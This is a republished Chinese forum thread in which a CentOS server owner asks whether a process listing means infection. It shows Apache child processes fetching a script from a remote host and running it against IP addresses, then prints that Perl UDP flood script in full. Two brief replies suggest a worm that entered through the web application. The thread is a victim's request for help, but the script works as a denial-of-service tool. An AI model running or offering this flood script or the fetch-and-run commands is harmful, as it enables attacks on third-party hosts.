当前位置:  技术问答>linux和unix

大家帮忙看看,是不是中病毒了?咋个解决啊!

    来源: 互联网  发布时间:2016-02-11

    本文导语:  系统:centos4   apache2.2.6+php4.4.7 ps -axuf 查看: root      4826  0.0  0.1 11372 4932 ?        Ss   Sep11   0:07 /usr/local/httpd/bin/httpd -k start nobody   18607  0.0  0.1 12240 5204 ?        S    07:55   0:01  _ ...

系统:centos4   apache2.2.6+php4.4.7

ps -axuf 查看:

root      4826  0.0  0.1 11372 4932 ?        Ss   Sep11   0:07 /usr/local/httpd/bin/httpd -k start
nobody   18607  0.0  0.1 12240 5204 ?        S    07:55   0:01  _ /usr/local/httpd/bin/httpd -k start
nobody   18730  0.0  0.0  6312 1060 ?        S    08:24   0:00  |   _ sh -c cd /tmp;./udp.pl 200.149.101.147 53 200
nobody   18731  100  0.0  7172 2212 ?        R    08:24  46:24  |       _ /usr/bin/perl ./udp.pl 200.149.101.147 53 200
nobody   18612  0.0  0.1 12232 5188 ?        S    07:55   0:00  _ /usr/local/httpd/bin/httpd -k start
nobody   18714  0.0  0.0  6092 1060 ?        S    08:23   0:00  |   _ sh -c cd /tmp;wget bym.t35.com/ddos/udp.pl;chmod 777 u
nobody   18715  0.0  0.0  7460 1604 ?        S    08:23   0:00  |       _ wget bym.t35.com/ddos/udp.pl
nobody   18642  0.0  0.1 12304 5180 ?        S    08:08   0:00  _ /usr/local/httpd/bin/httpd -k start
nobody   18646  0.0  0.0  6388 1060 ?        S    08:11   0:00  |   _ sh -c cd /tmp;wget http://bym.t35.com/ddos/udp.pl
nobody   18647  0.0  0.0  7508 1608 ?        S    08:11   0:00  |       _ wget http://bym.t35.com/ddos/udp.pl
nobody   18655  0.0  0.1 12356 5188 ?        S    08:12   0:00  _ /usr/local/httpd/bin/httpd -k start
nobody   18686  0.0  0.0  7240 1056 ?        S    08:15   0:00  |   _ sh -c cd /tmp;perl udp.pl 200.149.101.148 80 500
nobody   18687 99.8  0.0  7544 2212 ?        R    08:15  54:58  |       _ perl udp.pl 200.149.101.148 80 500
nobody   18695  0.0  0.1 12356 5180 ?        S    08:18   0:00  _ /usr/local/httpd/bin/httpd -k start
nobody   18712  0.0  0.0  6460 1060 ?        S    08:22   0:00  |   _ sh -c cd /tmp;wget bym.t35.com/ddos/udp.pl;chmod 777 u
nobody   18713  0.0  0.0  8624 1588 ?        S    08:22   0:00  |       _ wget bym.t35.com/ddos/udp.pl



在tmp 目录下面有 udp.pl文件,内容如下:

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0   n";
printf "if arg1/2 =0, randports/continous packets.n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "udp flood - odixn";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (; {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (; {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

大家帮忙看看
什么原因阿?刚开始以为是php和apache得版本太低,昨天刚升级到最新版本,还是这样!

|
有病毒的特点。

|
像是蠕虫吧?从你的WEB应用上窜进来的?

    
 
 
 
本站(WWW.)旨在分享和传播互联网科技相关的资讯和技术,将尽最大努力为读者提供更好的信息聚合和浏览方式。
本站(WWW.)站内文章除注明原创外,均为转载、整理或搜集自网络。欢迎任何形式的转载,转载请注明出处。












  • 相关文章推荐
  • 大家帮忙看看错误如何解决
  • 一个还没解决的问题,请各位看有什么办法,帮帮忙!
  • linux登录错误!帮忙解决啊
  • 缺少com.ibm.ejs.包,请帮忙找一下,能解决者,答谢分100。另开帖。(急,在线等)
  • 菜鸟问题,请帮忙解决一下
  • 帮忙解决“Id 'X' respawning too fast”的问题
  • boot.ini乱码怎么解决,帮忙啊高手
  • 求助文件操作中修改文件中字段的问题,请大家帮忙解决
  • ender(ender) ( ) ,……等大侠请进!中文问题要事!!请大家帮忙解决!!
  • linux系统Adsl上网问题,大家帮忙解决
  • 我的GDB的list功能不好用啊,帮忙解决一下
  • 新手的BASH代码错误,求帮忙解决
  • 请帮忙解决一下,重谢!
  • "急"---小弟有一个很初级的问题,高手请帮帮忙,解决后立即加分
  • 帮忙看看下面错误,怎样解决!!!
  • 帮忙解决一个Vector的问题
  • 帮忙解决一个问题!
  • 哪位能帮忙解决一下???谢了。
  • 散分100,请大家帮忙解决一个问题
  • 菜鸟头次用linux,请高手帮忙解决几个问题?
  • 努力努力再努力,帮忙帮忙来帮忙!
  • 在servlet中有一个关于单引号输出的问题,请大家帮忙,帮忙,帮帮忙!!
  • 小问题,你一定能够帮忙!——菜鸟请求帮忙!!
  • 帮忙帮忙如何设置变量pathclass
  • 没人帮忙吗?我想用JAVA编一个像WINDOW中的画图软件,现在出现了如下问题,请各位老哥老姐帮帮忙
  • 帮帮忙!SCO OpenServer 5.0.5 的root用户口令丢了,怎么找回来啊,帮帮忙!!!!!!
  • 我用smartupload组件遇到问题了,请帮忙!!
  • webmail问题,请高手帮忙!!!谁会使用IMP 3.0????!!!
  • 脚本问题,帮忙
  • 高手帮忙解释
  • 求教求教,shell问题...各位大哥,帮忙下


  • 站内导航:


    特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

    ©2012-2021,,E-mail:www_#163.com(请将#改为@)

    浙ICP备11055608号-3